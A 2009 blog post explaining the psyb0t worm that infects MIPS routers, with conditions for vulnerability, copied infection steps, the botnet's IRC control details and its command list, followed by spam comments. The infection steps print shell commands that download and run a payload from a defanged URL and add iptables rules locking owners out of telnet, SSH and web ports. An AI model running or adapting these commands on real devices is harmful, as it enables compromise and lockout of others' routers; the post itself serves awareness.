Search This Blog

Friday, March 27, 2009

psyb0t - Am I vulnerable?

Just got some info that you will be vulnerable to this worm if:
  • Your device is a mipsel (MIPS running in little-endian mode, this is what the worm is compiled for) device.
  • Your device also has telnet, SSH or web-based interfaces available to the WAN, and
  • Your username and password combinations are weak, OR the daemons that your firmware uses are exploitable.
For point 1, its not hard, psyb0t v2 can probably fix that. So do not count on it you are SAFE if you do not satisfy point 1.

Also, it was suggested that if you find port 80, 23 and 22 are blocked, you should suspect something is going on. Well, unless your ISP usually already blocked them, then it's a bit hard to confirm. Come on? Which ISP will block port 80?? :P

I copied the infection steps here for those who are more technical:

Infection strategy

Get a shell on the vulnerable device (methods vary). Once a shell is acquired, the bot does the following things:

# rm -f /var/tmp/udhcpc.env
# wget

If wget is present, then it uses wget to download hxxp:// , and runs it in the background.

If wget is not present, the bot looks for "busybox ftpget", and then tries falling back to a tftp client. Once it is downloaded, it launches it in the background. The following snippet is the variant it uses if it finds that wget is usable.

# wget hxxp:// -P /var/tmp && chmod +x /var/tmp/udhcpc.env && /var/tmp/udhcpc.env &
udhcpc.env 100% |*****************************| 33744 00:00 ETA

It then takes several steps to lock anybody out of the device, including blocking telnet, sshd and web ports.

# iptables -A INPUT -p tcp --dport 23 -j DROP
# iptables -A INPUT -p tcp --dport 22 -j DROP
# iptables -A INPUT -p tcp --dport 80 -j DROP

This concludes the infection process.

And more interesting, these are the ircbot and commands:

IRC Botnet

Command and control server:
IP: (master controller, Windstream Communications AS16687)
IP: (backup controller? HKnet/REACH AS?????)
Port: 5050
Password: $!0@
Channel: #mipsel
Key: %#8b
NickPattern: \[NIP\]-[A-Z/0-9]{9}
BotController: DRS
DroneURL: hxxp:// (backup copy, i did not write it) control domain nameservers:,,, [suspended]

IRC Commands

.mode   -setsamodeonachannel
.login -logintothebot
.logout -logout
.exit -causesthebotnettoexitandremoveitself
.sh -runsonshell
.tlist -listsallthreads
.kill -killsathread
.killall -killsthreads by glob-match pattern
.silent -makesthebotstopsendingtochannel
.getip -showbotWANipaddress
.visit -floodURLwithGETrequests
.scan -scansarandomrangeforvulnerablerouters/modems
.rscan -scansaCIDRrangeforvulnerablerouters/modems
.lscan -scansthelocalsubnetforvulnerablerouters/modems
.lrscan -scansarangeinthelocalsubnetforvulnerablerouters/modems
.split -splitstheworkloadofascanthreadintotwothreads
.sql -scansforvulnerableMySQLserversandattemptstomakethemdownloadandrunURL
.pma -scansforvulnerablephpMyAdminandattemptstomakethemdownloadandrunURL
.sleep -makesthebotsleepforthegiventime
.sel -???
.esel -skipnextpartiflocaleisnotX
.vsel -skipnextpartifversionisnotX
.gsel -???
.rejoin[delay] -cyclethechannelafterdelay
.upgrade -downloadnewbotfromthedistributionsite
.ver -returns"[PRIVATE]PSYB0T"followedbyversion
.rs -returnsdetectedrapidshareURLsandlogins
.rsgen -generateabogusrapidshareloginpageandforceusertobrowsetoit
.rsloop -runsawebserveri/olooponasathread
.wget -runswgetwiththeprovidedurl
.r00t -attemptstoraiseeffectiveUIDusingvmsplice()exploit(seemspointless)
.sflood -sendsSYNpacketstoIP
.uflood -sendsUDPpacketstoIP
.iflood -sendsICMPpingstoIP
.pscan -portscansIP
.fscan -triestobruteforceFTPserveratIP
More info at:


Anonymous said...

An outstanding share! I have just forwarded this onto a colleague who was conducting a little research on this.

And he in fact ordered me dinner simply because I
stumbled upon it for him... lol. So let me reword this....
Thank YOU for the meal!! But yeah, thanks for spending some time to talk about this matter here
on your website.

Feel free to visit my blog - Eugene Limousines

Anonymous said...

Do you mind if I quote a couple of your articles
as long as I provide credit and sources back to your site?
My blog site is in the very same niche as yours and my visitors would definitely benefit from
a lot of the information you provide here.

Please let me know if this okay with you. Thank you!

Feel free to visit my webpage: los angeles Moving company

Winston Avalon said...

sure you are welcome to quote it.

Amazon Gift Cards!

Thanks for viewing!

Copyright © 2008, All rights reserved.